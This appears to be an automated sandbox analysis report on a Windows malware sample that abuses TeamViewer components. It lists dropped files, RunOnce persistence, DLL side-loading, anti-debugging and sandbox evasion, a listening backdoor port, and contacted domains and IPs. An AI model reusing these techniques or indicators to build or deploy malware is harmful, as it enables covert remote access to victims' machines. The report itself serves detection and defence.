Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll Jump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW, 5_2_004E177C

Boot Survival:

barindex
Creates or modifies windows services
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C3920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW, 3_2_6E5C3920
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\wogZe27GBB.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004FB7F9 5_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004DC9D6 5_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00500C6A 5_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004FFF68 5_2_004FFF68
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 3040 Thread sleep count: 301 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 3040 Thread sleep time: -150500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 5512 Thread sleep count: 294 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 5512 Thread sleep time: -147000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6328 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6E5CB420
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_004FFF68 5_2_004FFF68
Contains functionality to query network adapater information
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo, 5_2_004B9A29
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetAdaptersInfo, 5_2_6E5C88E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose, 0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 3_2_6E5C2EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 3_2_6E5C2960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 5_2_6E5C2EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 5_2_6E5C2960
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU{*4
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmp Binary or memory string: J6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pUN*i
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: ?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Open window title or class name: ollydbg
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0053496B
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6E5CB420
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E88
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6E5C8AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_0051523A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0053496B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00534A9B

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C54A0 LogonUserW,GetLastError,CloseHandle, 3_2_6E5C54A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C34E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle, 3_2_6E5C34E0
Source: UniPrint.exe, 00000005.00000002.1075366890.0000000003CB0000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp Binary or memory string: Progman
Source: UniPrint.exe, 00000005.00000002.1075366890.0000000003CB0000.00000004.00000001.sdmp Binary or memory string: usercomputerusProgram ManagerC:\Windows\explorer.exe3910574588847
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: nsrC1CA.tmp.0.dr Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 3_2_6E5C7240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_xtoa_s@20, 5_2_0054113A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA, 5_2_0054E79D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA, 5_2_0054E87F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 5_2_0054E915
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA, 5_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 5_2_0054E987
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 5_2_0054EB57
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 5_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 5_2_0054EC16
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 5_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 5_2_6E5C7240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_0054B459
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,73D5A680,lstrcat,lstrlen, 0_2_00405B88
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6E5C8AF0

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp, 5_2_00511D6F
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 483790 Sample: wogZe27GBB.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 72 40 Multi AV Scanner detection for dropped file 2->40 42 Multi AV Scanner detection for submitted file 2->42 6 wogZe27GBB.exe 15 2->6         started        9 svchost.exe 2->9         started        12 UniPrint.exe 12 12 2->12         started        15 8 other processes 2->15 process3 dnsIp4 20 C:\Users\user\AppData\...\UniPrint.exe, PE32 6->20 dropped 22 C:\Users\user\AppData\Roaming\...\TV.dll, PE32 6->22 dropped 24 C:\Users\user\...\Teamviewer_Resource_ja.dll, PE32 6->24 dropped 17 UniPrint.exe 6->17         started        44 DLL side loading technique detected 9->44 26 master13.teamviewer.com 185.188.32.23, 49761, 49762, 49763 TEAMVIEWER-ASDE Germany 12->26 28 widolapsed.info 45.153.241.148, 443, 49767, 49838 COMBAHTONcombahtonGmbHDE Germany 12->28 32 3 other IPs or domains 12->32 30 192.168.2.1 unknown unknown 15->30 file5 signatures6 process7 signatures8 34 Tries to detect sandboxes and other dynamic analysis tools (window names) 17->34 36 Creates processes via WMI 17->36 38 Contains functionality to detect sleep reduction / modifications 17->38
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.172.235.146
 unknown Austria
42473 AS-ANEXIAANEXIAInternetdienstleistungsGmbHAT false
185.188.32.23
 master13.teamviewer.com Germany
43304 TEAMVIEWER-ASDE false
45.153.241.148
 widolapsed.info Germany
30823 COMBAHTONcombahtonGmbHDE false

Private
IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
widolapsed.info 45.153.241.148 true
master13.teamviewer.com 185.188.32.23 true
ping3.dyngate.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 false
    		high
    http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip false
      		high
